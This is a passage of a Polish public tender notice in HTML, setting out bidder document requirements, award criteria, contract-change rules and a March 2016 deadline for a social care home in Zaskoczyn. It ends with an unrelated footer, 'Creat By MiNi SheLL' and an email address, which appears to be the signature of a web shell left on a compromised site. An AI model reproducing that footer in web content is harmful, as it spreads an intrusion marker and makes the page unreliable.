<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy (wzór zał. nr 1 do SIWZ), 
2.Wykaz wykonanych usług (wzór zał. nr 4 do SIWZ),
3. Podpisany wzór umowy na świadczenie usług (zał. nr 5 do SIWZ),
4.Podpisany wzór umowy najmu pomieszczeń (zał. nr 6 do SIWZ),
5.Oświadczenie o posiadanym potencjale kadrowym (zał. nr 7 do SIWZ),
6.Oświadczenie o przynależności do grupy kapitałowej  (zał. nr 8 do SIWZ),
7.Informacja na temat części zamówienia, których wykonanie wykonawca zamierza    powierzyć podwykonawcom (zał. nr 9 do SIWZ)
8.Potwierdzenie  wniesienia wadium: potwierdzenie dokonanego przelewu lub oryginał wraz z potwierdzoną kopią dokumentu stanowiącego wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Doświadczenie wykonawcy (w świadczeniu usług gastronomicznych) - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Niedopuszczalna jest pod rygorem nieważności zmiana postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że konieczność zmiany umowy wystąpi w wyniku następujących zdarzeń:
a)wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym zmiany stawki podatku VAT, mające wpływ na wysokość ceny brutto za świadczoną robotę. W przypadku ustawowej zmiany stawki podatku VAT, należne Wykonawcy z tytułu wykonania przedmiotu umowy wynagrodzenie zostanie ustalone z uwzględnieniem stawki podatku wynikającej z obowiązujących przepisów. Zmiana wysokości wynagrodzenia dotyczyć będzie usług wykonanych po dacie podpisania aneksu;
b)	inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia usług będących przedmiotem zamówienia wg założeń określonych w SIWZ.
2.Wszelkie zmiany umowy wymagają formy pisemnej w postaci aneksu, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-gdanski.pl jednostki organizacyjne - DPS<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej LEŚNY w Zaskoczynie pok. Nr 1 I p. Specyfikacja nieodpłatna   i ewentualne koszty przesyłki..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2016 godzina 11:30, miejsce: Dom Pomocy Społecznej LEŚNY w Zaskoczynie- Sekretariat II p.
Termin otwarcia ofert: 15.03.2016 r., o godz. 12:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com